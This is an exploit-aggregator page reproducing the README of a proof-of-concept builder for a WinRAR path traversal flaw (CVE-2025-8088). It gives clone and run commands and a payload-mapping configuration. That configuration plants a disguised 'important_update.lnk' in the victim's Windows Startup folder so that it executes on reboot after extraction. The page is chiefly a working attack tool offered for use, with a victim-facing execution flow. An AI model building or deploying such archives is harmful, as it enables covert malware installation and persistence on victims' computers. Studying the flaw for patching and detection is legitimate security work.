Share
## https://sploitus.com/exploit?id=357A41A7-9B97-5545-A8DA-84693362BC9C
# CVE-2025-8088-WinRAR-builder
A POC exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower

## ๐Ÿš€ How It Works

1. Creates a Rar embed with other payloads
2. Using Multiple ADS Streams ๐Ÿ”„ - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers โš™๏ธ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup ๐Ÿ“‚ - Attempts to write payload to Windows startup folder when extracted

## ๐Ÿ› ๏ธ Usage

1. Clone the repository
```bash
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
```

2. Prepare payloads
```
mkdir payloads
```
- Add our payloads to that folder (exe, dll, lnk, ...)
- Modify `PAYLOAD_MAPPING` in the script
```python
# 2. Map our payload to corresponding destination
#   Format: (filename_in_payloads_dir, target_extract_dest)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # Payload 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # Payload 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # Payload 3
    # Add your own    
]
```

3. Run the exploit
```
python builder.py 
```

## ๐Ÿ”„ Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (โ‰ค7.12)
2. Payload gets written to destination folder, e.g. :
   ```bash
   AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
   ```
3. On next reboot โžก๏ธ payload executes automatically

## ๐Ÿ“‹ Requirements
- Windows OS ๐ŸชŸ
- Python 3.x ๐Ÿ
- WinRAR installed